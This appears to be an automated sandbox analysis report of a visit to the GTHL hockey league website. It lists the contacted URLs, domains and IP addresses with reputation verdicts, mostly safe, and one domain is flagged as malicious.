Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://gthlcanada.com0%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://www.reginapats.com0%Avira URL Cloudsafe
https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2025/01/07211622/DECAAA-Title-1600x900-GTHL-Power-Rankings-730x411.jpg0%Avira URL Cloudsafe
https://gthlcanada.com/app/themes/base/assets/dist/css/core.css0%Avira URL Cloudsafe
http://jsperf.com/key-missing0%Avira URL Cloudsafe
https://gthlcanada.com/app/themes/base/bower_components/moment-timezone/builds/moment-timezone-with-data.min.js0%Avira URL Cloudsafe
https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/12/02164945/AROUND-THE-G-TITLE-November-2024-730x411.jpg0%Avira URL Cloudsafe
https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2019/09/05144420/GTHL_Header17-G-1024x200-1024x200.jpg0%Avira URL Cloudsafe
http://www.guelphstorm.com/0%Avira URL Cloudsafe
https://gthlcanada.com/app/themes/gthl/assets/dist/css/theme.css0%Avira URL Cloudsafe
http://lesterchan.net0%Avira URL Cloudsafe
https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/01/09095632/Big-box-ad-creative-300x25012.jpg0%Avira URL Cloudsafe
http://dom.spec.whatwg.org/#dom-domimplementation-hasfeature0%Avira URL Cloudsafe
http://jsperf.com/obj-vs-arr-iteration0%Avira URL Cloudsafe
http://www.armadahockey.ca/0%Avira URL Cloudsafe
https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2023/05/02161525/START-HOCKEY-1080x1080-Start-Somewhere-320x320.jpg0%Avira URL Cloudsafe
http://www.seattlethunderbirds.com0%Avira URL Cloudsafe
https://gthlcanada.com/starthockey/0%Avira URL Cloudsafe
https://gthlcanada.com/article/iplayintheg-2023-pro-hockey-life-cup0%Avira URL Cloudsafe
http://www.soogreyhounds.com/0%Avira URL Cloudsafe
https://openjsf.org/0%Avira URL Cloudsafe
http://www.kootenayice.net0%Avira URL Cloudsafe
https://gthlcanada.com/app/plugins/js_composer/assets/css/vc_lte_ie9.min.css0%Avira URL Cloudsafe
https://dff2h0hbfv6w4.cloudfront.net/scripts/loader.js0%Avira URL Cloudsafe
https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2025/01/02124840/GTHL-Officials-1600x900-730x0%Avira URL Cloudsafe
https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/11/13195651/HHOF23_ShootSaveCall_300x250.gif0%Avira URL Cloudsafe
https://gthlcanada.com/app/plugins/wp-polls/polls-js.js?ver=2.70%Avira URL Cloudsafe
https://gthlcanada.com/app/plugins/latest_news/public/css/latest-news-public.css?ver=1.0.00%Avira URL Cloudsafe
http://www.hockeyphoenix.ca/0%Avira URL Cloudsafe
https://gthlcanada.com/app/plugins/tagged_content_blocks/public/js/tagged-content-blocks-public.js?v0%Avira URL Cloudsafe
https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/11/06164616/AROUND-THE-G-TITLE-November-2024-730x411.jpg0%Avira URL Cloudsafe
http://saskatoonblades.com0%Avira URL Cloudsafe
https://gthlcanada.com/article/gthl-aa-power-rankings-december-20240%Avira URL Cloudsafe
https://gthlcanada.com/article/gthl-carnegie-family-announce-herbert-h-carnegie-award0%Avira URL Cloudsafe
http://www.blazerhockey.com0%Avira URL Cloudsafe
http://www.spokanechiefs.com0%Avira URL Cloudsafe
https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2022/10/26123500/400X350-SAFE-SPORT-COMPLAINT-PROCESS-EN-320x280.jpg0%Avira URL Cloudsafe
http://kelownarockets.com0%Avira URL Cloudsafe
https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/10/10123452/IMG_7761-e1728578153211-730x380.jpg0%Avira URL Cloudsafe
https://gthlcanada.com/app/themes/base/bower_components/react-mini-router/dist/react-mini-router.min.js0%Avira URL Cloudsafe
https://gthlcanada.com/article/around-the-g-november-2024-preview0%Avira URL Cloudsafe
http://www.voltigeurs.ca/0%Avira URL Cloudsafe
https://gthlcanada.com/article/gthl-announces-appointment-of-special-integrity-commissioner0%Avira URL Cloudsafe
https://gthlcanada.com/gallery/gallery-2024-gthl-breakout-summit0%Avira URL Cloudsafe
http://www.hitmenhockey.com0%Avira URL Cloudsafe
https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/11/28141908/0C9A3113-730x487.jpg0%Avira URL Cloudsafe
https://gthlcanada.com/article/u10-a-applewood-coyotes-give-back-to-mississauga-food-bank0%Avira URL Cloudsafe
https://gthlcanada.com/wp-json/0%Avira URL Cloudsafe
https://gthlcanada.com/article/toronto-red-wings-announce-three-year-partnership-with-hockey-equalit0%Avira URL Cloudsafe
https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2021/07/17001307/GTHLLOGO-WEB-730x365.jpg0%Avira URL Cloudsafe
http://amshockey.com0%Avira URL Cloudsafe
https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2025/01/06205151/DECAA-Title-1600x900-GTHL-Power-Rankings-730x411.jpg0%Avira URL Cloudsafe
http://www.sudburywolves.com/0%Avira URL Cloudsafe
https://gthlcanada.com/article/balancing-school-and-hockey-tips-for-student-athletes0%Avira URL Cloudsafe
https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2020/04/09100946/82137226_2705410846193604_190%Avira URL Cloudsafe
https://gthlcanada.com/article/four-gthl-alumni-named-to-national-womens-under-18-team-for-2025-iihf0%Avira URL Cloudsafe
https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/11/28143045/0C9A3474-730x487.jpg)0%Avira URL Cloudsafe
http://www.battalionhockey.com/0%Avira URL Cloudsafe
https://gthlcanada.com/article/iplayintheg-hockey-at-home0%Avira URL Cloudsafe
https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2023/05/02161525/START-HOCKEY-1080x1080-Start0%Avira URL Cloudsafe
https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2025/01/02154916/AROUND-THE-G-TITLE-January-2025-2-730x411.jpg0%Avira URL Cloudsafe
http://www.oshawagenerals.com/0%Avira URL Cloudsafe
https://gthlcanada.com/article/2025-gthl-top-prospects-game-to-move-to-scotiabank-pond0%Avira URL Cloudsafe
https://gthlcanada.com/article/snacks-to-fuel-performance0%Avira URL Cloudsafe
https://gthlcanada.com/app/plugins/wpml-cms-nav/res/css/cms-navigation-base.css?ver=1.4.150%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
securepubads.g.doubleclick.net
172.253.63.154
truefalse
    high
    pagead-googlehosted.l.google.com
    64.233.180.132
    truefalse
      high
      content.jwplatform.com
      3.171.100.83
      truefalse
        high
        www.googletagservices.com
        172.253.62.157
        truefalse
          high
          virtual.urban-orthodontics.com
          185.76.79.50
          truefalse
            unknown
            ep1.adtrafficquality.google
            172.253.63.155
            truefalse
              high
              listgrowth.ctctcdn.com
              3.171.61.116
              truefalse
                high
                maxcdn.bootstrapcdn.com
                104.18.11.207
                truefalse
                  high
                  ep2.adtrafficquality.google
                  142.251.179.132
                  truefalse
                    high
                    d2pr6pnwfmh0za.cloudfront.net
                    54.239.153.138
                    truefalse
                      unknown
                      s3-w.us-east-1.amazonaws.com
                      52.217.171.9
                      truefalse
                        high
                        rum-static.pingdom.net
                        172.67.5.216
                        truefalse
                          high
                          prod-dem-collector-elb-611025824.eu-west-1.elb.amazonaws.com
                          18.202.38.59
                          truefalse
                            high
                            gthlcanada.com
                            137.117.65.222
                            truefalse
                              unknown
                              loopconstruct.com
                              176.53.147.97
                              truetrue
                                unknown
                                cdnjs.cloudflare.com
                                104.17.25.14
                                truefalse
                                  high
                                  www.google.com
                                  172.253.122.104
                                  truefalse
                                    high
                                    publickeyservice-a.msmt-3.gcp.privacysandboxservices.com
                                    34.160.138.104
                                    truefalse
                                      high
                                      secure.widget.cloud.opta.net
                                      unknown
                                      unknownfalse
                                        high
                                        rum-collector-2.pingdom.net
                                        unknown
                                        unknownfalse
                                          high
                                          gthl.s3.amazonaws.com
                                          unknown
                                          unknownfalse
                                            unknown
                                            dff2h0hbfv6w4.cloudfront.net
                                            unknown
                                            unknownfalse
                                              unknown
                                              static.ctctcdn.com
                                              unknown
                                              unknownfalse
                                                high
                                                publickeyservice.msmt.gcp.privacysandboxservices.com
                                                unknown
                                                unknownfalse
                                                  high
                                                  NameMaliciousAntivirus DetectionReputation
                                                  https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2025/01/07211622/DECAAA-Title-1600x900-GTHL-Power-Rankings-730x411.jpgfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://gthlcanada.com/app/themes/base/bower_components/moment-timezone/builds/moment-timezone-with-data.min.jsfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/12/02164945/AROUND-THE-G-TITLE-November-2024-730x411.jpgfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://rum-collector-2.pingdom.net/img/beacon.gif?id=5ae71569e970f89d2593f739&sAW=1920&sAH=1040&bIW=1920&bIH=953&pD=24&dPR=1&or=landscape-primary&nT=0&rC=0&nS=0&cS=170&cE=700&dLE=170&dLS=170&fS=7&hS=171&rE=-1&rS=-1&reS=700&resS=906&resE=1111&uEE=-1&uES=-1&dL=909&dI=5463&dCLES=5463&dCLEE=5464&dC=10399&lES=10399&lEE=10531&s=nt&title=GTHL%20%E2%80%93%20Official%20Site%20of%20the%20GTHL&path=https%3A%2F%2Fgthlcanada.com%2F&ref=&sId=eawsq55k&sST=1736802081&sIS=1&rV=0&v=1.4.1false
                                                    high
                                                    https://gthlcanada.com/app/themes/gthl/assets/dist/css/theme.cssfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2019/09/05144420/GTHL_Header17-G-1024x200-1024x200.jpgfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://gthlcanada.com/app/themes/base/assets/dist/css/core.cssfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/01/09095632/Big-box-ad-creative-300x25012.jpgfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://securepubads.g.doubleclick.net/pagead/managed/js/gpt/m202501070101/pubads_impl.jsfalse
                                                      high
                                                      https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2023/05/02161525/START-HOCKEY-1080x1080-Start-Somewhere-320x320.jpgfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://ep1.adtrafficquality.google/getconfig/sodar?sv=200&tid=gpt&tv=m202501070101&st=envfalse
                                                        high
                                                        https://gthlcanada.com/app/plugins/latest_news/public/css/latest-news-public.css?ver=1.0.0false
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/11/13195651/HHOF23_ShootSaveCall_300x250.giffalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://gthlcanada.com/app/plugins/wp-polls/polls-js.js?ver=2.7false
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://securepubads.g.doubleclick.net/pcs/view?xai=AKAOjsu44-NW2lkWqO94iuv2Uu_fmIslyj4itC84H85KgUkrQuEUXA02rqDeH_j34PDJO2LZQM3gxeTzi5w_a5BS6bue_XNJSWmXHS_WLHXB1hvCVpN7K1TSPefqy2CR4LnseshjLkU2fQelh1qihrIBVQurTBcwLIEafnGBHWuFEy4JinZy8L__xzA1E5_919AxE2dxsWgUePAnj02gX9q4LjQdxjb2i9OiWsVVdZec1XKdGuumPKx63GEHjjL-5cVXeQFnGGEcIOXnsZad0FjIP-Sel_bwmgArb7TTHKvmIglT73FQWpfdERZ2dY8ZzlkUsuC-8iqkbfrjiNqBzoRdGLFKKoMDnXexSk7sHhfGC5Y1T7gqGxDZskV_5WUpzkfVAaVoX0trNdc&sai=AMfl-YSAUS1Gzr9I3iEKfZrezbkOI7yoq1mIP_O0iJGKtcEun36XY3keea_Dux32pbFy1yABxvFbOcmBt7IQjGo0-JCw7nBDBU47kHQrkooHPFTsORZmgnfRT6ttgWo0IE2JuHeN_XFt57TBQVZt4JY-&sig=Cg0ArKJSzHP-3NwCphJcEAE&uach_m=%5BUACH%5D&adurl=false
                                                          high
                                                          https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/11/06164616/AROUND-THE-G-TITLE-November-2024-730x411.jpgfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2022/10/26123500/400X350-SAFE-SPORT-COMPLAINT-PROCESS-EN-320x280.jpgfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/10/10123452/IMG_7761-e1728578153211-730x380.jpgfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://gthlcanada.com/app/themes/base/bower_components/react-mini-router/dist/react-mini-router.min.jsfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://ep2.adtrafficquality.google/sodar/sodar2.jsfalse
                                                            high
                                                            https://securepubads.g.doubleclick.net/pcs/view?xai=AKAOjsumxo8ubsb_JN_P84oG_65VDFHnMlwXALd00ITDTfsvwecLdTuIS_A3xIuuAgrYlGWMj7Hn0oFamwwtoUmQcyCN7D2rq0emZUgaiDVMuJHXNuvx-kUM4-ybnPRDjDLPbyoKVMOJVqwwvjNPXuk6q9OcUnKx-9vJUTDkqDrnoXax-4RQHxaemZQDnPJvsE99kumH3kwmz7tc-vYNtwRNBLqtzRg84LDzSrK26JxeKB8LLBc36Hc_-RtWdOQ2Le7dlOpTiym-h2O31motHl8ap8JUc8XFQ5tEzIwkS8T78kkDNZ9E57o0wQKq61W1nxz7fFyfPZnMfoFGcEFOed-S3Q_VVerldaRIun-_O3wR3CJL7RcFsVmamgNly4m9-soCF3D7-qnTlg&sai=AMfl-YQOExIpCw4GllDMcTdfYiraFOs-EZuInERO7BS2yD5FEfHig_kIBwVhe92qpOw_p1FTBOK7UZSz_UnXSmAZ4bYman9eKa3AOe6sJoI3yL2OZfatB62CoVYPlG7-kRKGsRGE8pfwQMEV3GNJkxCgqg&sig=Cg0ArKJSzNhjn_2BU4OsEAE&uach_m=%5BUACH%5D&adurl=false
                                                              high
                                                              https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/11/28141908/0C9A3113-730x487.jpgfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://www.google.com/recaptcha/api.jsfalse
                                                                high
                                                                https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2021/07/17001307/GTHLLOGO-WEB-730x365.jpgfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2025/01/06205151/DECAA-Title-1600x900-GTHL-Power-Rankings-730x411.jpgfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://cdnjs.cloudflare.com/ajax/libs/react/0.12.1/react-with-addons.jsfalse
                                                                  high
                                                                  https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2025/01/02154916/AROUND-THE-G-TITLE-January-2025-2-730x411.jpgfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://www.google.com/recaptcha/api2/bframe?hl=en&v=zIriijn3uj5Vpknvt_LnfNbF&k=6LfHrSkUAAAAAPnKk5cT6JuKlKPzbwyTYuO8--Vrfalse
                                                                    high
                                                                    https://gthlcanada.com/app/plugins/wpml-cms-nav/res/css/cms-navigation-base.css?ver=1.4.15false
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                                    https://www.googletagservices.com/agrp/chromecache_157.1.dr, chromecache_246.1.dr, chromecache_375.1.dr, chromecache_290.1.drfalse
                                                                      high
                                                                      http://cluster.leaguestat.com/feed/?feed=modulekit&view=transactions&key=c680916776709578&fmt=json&cchromecache_163.1.dr, chromecache_214.1.drfalse
                                                                        high
                                                                        https://ep2.adtrafficquality.googlechromecache_210.1.drfalse
                                                                          high
                                                                          http://www.guelphstorm.com/chromecache_163.1.dr, chromecache_214.1.drfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://ampcid.google.com/v1/publisher:getClientIdchromecache_263.1.dr, chromecache_218.1.drfalse
                                                                            high
                                                                            http://www.reginapats.comchromecache_163.1.dr, chromecache_214.1.drfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://stanza.co/schedules/cpl/valourfcschedulechromecache_163.1.dr, chromecache_214.1.drfalse
                                                                              high
                                                                              https://support.google.com/recaptcha/#6175971chromecache_347.1.dr, chromecache_292.1.dr, chromecache_310.1.drfalse
                                                                                high
                                                                                http://lesterchan.netchromecache_192.1.drfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://jsperf.com/key-missingchromecache_168.1.dr, chromecache_354.1.drfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://dom.spec.whatwg.org/#dom-domimplementation-hasfeaturechromecache_168.1.dr, chromecache_354.1.drfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://www.armadahockey.ca/chromecache_163.1.dr, chromecache_214.1.drfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://github.com/jbleduigouchromecache_225.1.dr, chromecache_296.1.drfalse
                                                                                  high
                                                                                  https://gthlcanada.com/starthockey/chromecache_261.1.drfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://jsperf.com/obj-vs-arr-iterationchromecache_168.1.dr, chromecache_354.1.drfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://www.soogreyhounds.com/chromecache_163.1.dr, chromecache_214.1.drfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://openjsf.org/chromecache_246.1.dr, chromecache_290.1.drfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://support.google.com/recaptchachromecache_310.1.drfalse
                                                                                    high
                                                                                    https://ep1.adtrafficquality.google/pagead/gen_204?id=sodar2&v=231chromecache_172.1.drfalse
                                                                                      high
                                                                                      http://www.seattlethunderbirds.comchromecache_163.1.dr, chromecache_214.1.drfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://gthlcanada.com/article/iplayintheg-2023-pro-hockey-life-cupchromecache_261.1.drfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://ep1.adtrafficquality.google/pagead/gen_204?id=sodar2&v=232chromecache_222.1.dr, chromecache_210.1.drfalse
                                                                                        high
                                                                                        https://github.com/facebook/react/issues/708.chromecache_168.1.dr, chromecache_354.1.drfalse
                                                                                          high
                                                                                          https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2025/01/02124840/GTHL-Officials-1600x900-730xchromecache_261.1.drfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://stanza.co/schedules/cpl/pacificfcschedulechromecache_163.1.dr, chromecache_214.1.drfalse
                                                                                            high
                                                                                            http://www.kootenayice.netchromecache_163.1.dr, chromecache_214.1.drfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://stanza.co/schedules/cpl/fcedmontonschedulechromecache_163.1.dr, chromecache_214.1.drfalse
                                                                                              high
                                                                                              https://securepubads.g.doubleclick.net/pagead/js/cocar.jschromecache_277.1.dr, chromecache_348.1.drfalse
                                                                                                high
                                                                                                https://dff2h0hbfv6w4.cloudfront.net/scripts/loader.jschromecache_261.1.drfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://gthlcanada.com/app/plugins/js_composer/assets/css/vc_lte_ie9.min.csschromecache_261.1.drfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                http://underscorejs.org/LICENSEchromecache_246.1.dr, chromecache_290.1.drfalse
                                                                                                  high
                                                                                                  http://fb.me/react-warning-keyschromecache_168.1.dr, chromecache_354.1.drfalse
                                                                                                    high
                                                                                                    http://www.hockeyphoenix.ca/chromecache_163.1.dr, chromecache_214.1.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://gthlcanada.com/app/plugins/tagged_content_blocks/public/js/tagged-content-blocks-public.js?vchromecache_261.1.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    http://saskatoonblades.comchromecache_163.1.dr, chromecache_214.1.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://gthlcanada.com/article/gthl-aa-power-rankings-december-2024chromecache_261.1.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://gthlcanada.com/article/gthl-carnegie-family-announce-herbert-h-carnegie-awardchromecache_261.1.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    http://www.blazerhockey.comchromecache_163.1.dr, chromecache_214.1.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    http://www.spokanechiefs.comchromecache_163.1.dr, chromecache_214.1.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    http://kelownarockets.comchromecache_163.1.dr, chromecache_214.1.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://gthlcanada.com/article/around-the-g-november-2024-previewchromecache_261.1.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    http://www.voltigeurs.ca/chromecache_163.1.dr, chromecache_214.1.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://gthlcanada.com/article/gthl-announces-appointment-of-special-integrity-commissionerchromecache_261.1.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://npms.io/search?q=ponyfill.chromecache_246.1.dr, chromecache_290.1.drfalse
                                                                                                      high
                                                                                                      https://gthlcanada.com/gallery/gallery-2024-gthl-breakout-summitchromecache_261.1.drfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://www.hitmenhockey.comchromecache_163.1.dr, chromecache_214.1.drfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://github.com/google/safevalues/issueschromecache_277.1.dr, chromecache_348.1.drfalse
                                                                                                        high
                                                                                                        https://gthlcanada.com/article/u10-a-applewood-coyotes-give-back-to-mississauga-food-bankchromecache_261.1.drfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://cloud.google.com/contactchromecache_347.1.dr, chromecache_292.1.dr, chromecache_310.1.drfalse
                                                                                                          high
                                                                                                          https://github.com/sedovsekchromecache_225.1.dr, chromecache_296.1.drfalse
                                                                                                            high
                                                                                                            https://gthlcanada.com/wp-json/chromecache_261.1.drfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://gthlcanada.com/article/toronto-red-wings-announce-three-year-partnership-with-hockey-equalitchromecache_261.1.drfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            http://amshockey.comchromecache_163.1.dr, chromecache_214.1.drfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://gthlcanada.com/article/balancing-school-and-hockey-tips-for-student-athleteschromecache_261.1.drfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://github.com/MadMGchromecache_225.1.dr, chromecache_296.1.drfalse
                                                                                                              high
                                                                                                              http://www.sudburywolves.com/chromecache_163.1.dr, chromecache_214.1.drfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2020/04/09100946/82137226_2705410846193604_19chromecache_261.1.drfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/11/28143045/0C9A3474-730x487.jpg)chromecache_261.1.drfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://gthlcanada.com/article/four-gthl-alumni-named-to-national-womens-under-18-team-for-2025-iihfchromecache_261.1.drfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              http://www.battalionhockey.com/chromecache_163.1.dr, chromecache_214.1.drfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://cloud.google.com/recaptcha-enterprise/billing-informationchromecache_347.1.dr, chromecache_292.1.dr, chromecache_310.1.drfalse
                                                                                                                high
                                                                                                                https://gthlcanada.com/article/iplayintheg-hockey-at-homechromecache_261.1.drfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2023/05/02161525/START-HOCKEY-1080x1080-Startchromecache_261.1.drfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://github.com/avalychromecache_225.1.dr, chromecache_296.1.drfalse
                                                                                                                  high
                                                                                                                  http://www.oshawagenerals.com/chromecache_163.1.dr, chromecache_214.1.drfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://github.com/facebook/react/issues/1698chromecache_168.1.dr, chromecache_354.1.drfalse
                                                                                                                    high
                                                                                                                    https://github.com/irakli-janiashvilichromecache_225.1.dr, chromecache_296.1.drfalse
                                                                                                                      high
                                                                                                                      https://developers.google.com/recaptcha/docs/faq#are-there-any-qps-or-daily-limits-on-my-use-of-recachromecache_347.1.dr, chromecache_292.1.dr, chromecache_310.1.drfalse
                                                                                                                        high
                                                                                                                        https://gthlcanada.com/article/2025-gthl-top-prospects-game-to-move-to-scotiabank-pondchromecache_261.1.drfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        https://gthlcanada.com/article/snacks-to-fuel-performancechromecache_261.1.drfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        https://api.performfeeds.com/soccerdata/playercareer/1ha7bnfgb89131ey8cpx5vvvpl?&prsn=chromecache_163.1.dr, chromecache_214.1.drfalse
                                                                                                                          high
                                                                                                                          • No. of IPs < 25%
                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                          • 75% < No. of IPs
                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                          3.171.61.58
                                                                                                                          unknownUnited States
                                                                                                                          16509AMAZON-02USfalse
                                                                                                                          34.160.138.104
                                                                                                                          publickeyservice-a.msmt-3.gcp.privacysandboxservices.comUnited States
                                                                                                                          2686ATGS-MMD-ASUSfalse
                                                                                                                          54.239.153.76
                                                                                                                          unknownUnited States
                                                                                                                          16509AMAZON-02USfalse
                                                                                                                          172.253.122.132
                                                                                                                          unknownUnited States
                                                                                                                          15169GOOGLEUSfalse
                                                                                                                          54.239.153.138
                                                                                                                          d2pr6pnwfmh0za.cloudfront.netUnited States
                                                                                                                          16509AMAZON-02USfalse
                                                                                                                          172.253.63.155
                                                                                                                          ep1.adtrafficquality.googleUnited States
                                                                                                                          15169GOOGLEUSfalse
                                                                                                                          142.251.111.105
                                                                                                                          unknownUnited States
                                                                                                                          15169GOOGLEUSfalse
                                                                                                                          172.253.122.104
                                                                                                                          www.google.comUnited States
                                                                                                                          15169GOOGLEUSfalse
                                                                                                                          176.53.147.97
                                                                                                                          loopconstruct.comUnited Kingdom
                                                                                                                          35791VANNINVENTURESGBtrue
                                                                                                                          18.202.38.59
                                                                                                                          prod-dem-collector-elb-611025824.eu-west-1.elb.amazonaws.comUnited States
                                                                                                                          16509AMAZON-02USfalse
                                                                                                                          3.171.61.116
                                                                                                                          listgrowth.ctctcdn.comUnited States
                                                                                                                          16509AMAZON-02USfalse
                                                                                                                          63.34.182.143
                                                                                                                          unknownUnited States
                                                                                                                          16509AMAZON-02USfalse
                                                                                                                          52.217.65.212
                                                                                                                          unknownUnited States
                                                                                                                          16509AMAZON-02USfalse
                                                                                                                          142.251.16.106
                                                                                                                          unknownUnited States
                                                                                                                          15169GOOGLEUSfalse
                                                                                                                          172.67.5.216
                                                                                                                          rum-static.pingdom.netUnited States
                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                          172.253.63.154
